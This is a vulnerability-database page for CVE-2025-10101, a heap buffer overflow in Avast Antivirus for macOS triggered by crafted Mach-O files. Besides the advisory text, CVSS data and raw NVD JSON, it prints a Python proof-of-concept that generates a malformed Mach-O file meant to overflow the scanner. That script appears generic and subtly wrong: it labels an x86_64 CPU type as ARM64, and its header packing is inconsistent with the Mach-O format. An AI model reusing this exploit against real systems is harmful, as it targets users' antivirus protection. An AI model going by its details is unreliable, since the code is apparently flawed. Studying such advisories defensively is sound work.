Security Vulnerability Report
中文
CVE-2025-10101 CVSS 8.1 HIGH

CVE-2025-10101

Published: 2025-12-01 16:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Heap-based Buffer Overflow, Out-of-bounds Write vulnerability in Avast Antivirus on MacOS of a crafted Mach-O file may allow Local Execution of Code or Denial of Service of antivirus protection. This issue affects Antivirus: from 15.7 before 3.9.2025.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Avast Antivirus (MacOS) < 15.7
Avast Antivirus (MacOS) >= 15.7 且 < 3.9.2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-10101 PoC - Malformed Mach-O File Generator # This PoC generates a minimal Mach-O file that may trigger buffer overflow in Avast Antivirus import struct import sys def create_malformed_macho(): """ Create a malformed Mach-O file that could trigger heap buffer overflow in Avast Antivirus scanning engine on macOS. """ # Mach-O 64-bit magic number (big endian) MH_MAGIC_64 = 0xfeedfacf # File header structure mach_header = struct.pack('>IIIIIII', MH_MAGIC_64, # magic number 0x01000007, # cputype (ARM64) 0x80000000, # cpusubtype 0x00000002, # filetype (EXECUTE) 0x00000003, # ncmds (number of load commands) 0x20000000, # sizeofcmds 0x00000085 # flags ) # Create oversized load command to trigger buffer overflow # LC_SEGMENT_64 command with oversized segment data LC_SEGMENT_64 = 0x19 cmd_size = 0x1000 # Intentionally large command size segment_cmd = struct.pack('>II', LC_SEGMENT_64, cmd_size) segment_name = b'__TEXT' + b'\x00' * (16 - 6) # Craft oversized segment data to overflow buffer oversized_data = b'A' * 0x2000 # Data larger than expected buffer mach_file = mach_header + segment_cmd + segment_name mach_file += struct.pack('>IIIIIIII', 0, 0x1000, 0, 0x1000, 0, 0, 0, 0) mach_file += oversized_data return mach_file if __name__ == '__main__': output_file = 'CVE-2025-10101_poc.macho' macho_data = create_malformed_macho() with open(output_file, 'wb') as f: f.write(macho_data) print(f'[+] PoC Mach-O file created: {output_file}') print(f'[+] File size: {len(macho_data)} bytes') print('[!] Note: This PoC is for educational/research purposes only')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10101", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:50.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based Buffer Overflow, Out-of-bounds Write vulnerability in Avast Antivirus on MacOS of a crafted Mach-O file may allow Local Execution of Code or Denial of Service of antivirus protection.\nThis issue affects Antivirus: from 15.7 before 3.9.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.gendigital.com/us/en/contact-us/security-advisories/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.